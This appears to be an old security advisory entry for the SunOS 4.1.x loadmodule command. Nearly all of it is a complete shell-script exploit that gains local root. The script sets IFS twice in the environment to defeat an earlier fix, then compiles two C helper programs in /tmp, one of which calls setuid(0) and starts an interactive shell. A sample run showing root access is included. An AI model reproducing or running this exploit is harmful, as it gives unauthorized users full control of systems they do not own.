COMMAND

    loadmodule

SYSTEMS AFFECTED

    SunOs 4.1.x

PROBLEM

#!/bin/sh
#
# Usage: load.root
#
# Obtain root priviledges using loadmodule.
#
# loadmodule  has previously  been fixed  to clear  IFS, apparently by
# putenv("IFS=  ").   However,  we  can  still  exploit  system()   by
# having IFS defined twice in our environment.
#
# NB
# Some installations place loadmodule in $OPENWINHOME/bin.
#
# Sample run:
#
#	% load.root
#	# id
#	uid=0(root) gid=10(staff) groups=10(staff)
#	# exit
#	loadmodule: /usr/sys/sun4/OBJ/SandraBullock file does not exist.
#	Check your OpenWindows installation.
#	%



if [ ! -u "/usr/lib/loadmodule" ]; then
	echo "$0: /usr/lib/loadmodule does not exist, or not S_ISUID."
	exit 1
fi

umask 077

# TMPDIR is where we will build the necessary binaries, which
# we will clean up afterwards.

TMPDIR=/tmp
export TMPDIR

PATH=$TMPDIR:$PATH
export PATH

# set  env  IFS,  which  loadmodule  will  reset.   SUN  will    later
# be  renamed  by  our  executeable  to  IFS  (the  value of SUN  will
# be used by sh as the value of IFS).

IFS=2
SUN=/
export IFS
export SUN

# create program to run loadmodule

cat > $TMPDIR/California.c << 'EOF'
extern char *getenv();
main()
{
	char *c;
	c=getenv("SUN");
	c-=4;
	memcpy(c, "IFS", 3);
	execl("/usr/lib/loadmodule", "loadmodule",
		"SandraBullock", "SimoneAngel", (char *)0);
}
EOF

# create something to give us a shell as root

cat > $TMPDIR/FordEconoline.c << 'EOF'
main()
{
	setuid(0);
	putenv("IFS=");
	execl("/bin/sh", "sh", "-i", (char *)0);
}
EOF

# compile our programs

cc -o $TMPDIR/bin $TMPDIR/FordEconoline.c
cc -o $TMPDIR/California $TMPDIR/California.c


# We should get a # prompt at this point

$TMPDIR/California

# clean up

rm -f $TMPDIR/bin $TMPDIR/California\
	$TMPDIR/FordEconoline.c $TMPDIR/California.c